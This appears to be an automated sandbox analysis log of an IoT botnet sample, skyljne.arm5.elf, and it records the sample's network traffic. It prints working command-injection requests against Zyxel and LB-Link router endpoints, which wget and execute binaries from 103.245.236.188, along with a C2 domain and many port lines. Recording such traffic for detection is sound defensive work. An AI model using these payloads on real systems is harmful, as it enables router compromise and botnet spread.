            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jan 2024 12:16:31 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jan 2024 12:16:33 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: keep-aliveContent-Length: 74Content-Type: text/htmlDate: Fri, 12 Jan 2024 17:17:20 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Error</title></head><body>404 - Not Found</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jan 2024 19:56:21 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
            Source: skyljne.arm5.elfString found in binary or memory: http://103.245.236.188/skyljne.mips;$
            Source: skyljne.arm5.elfString found in binary or memory: http://103.245.236.188/skyljne.mpsl;
            Source: skyljne.arm5.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: skyljne.arm5.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41896
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53812
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
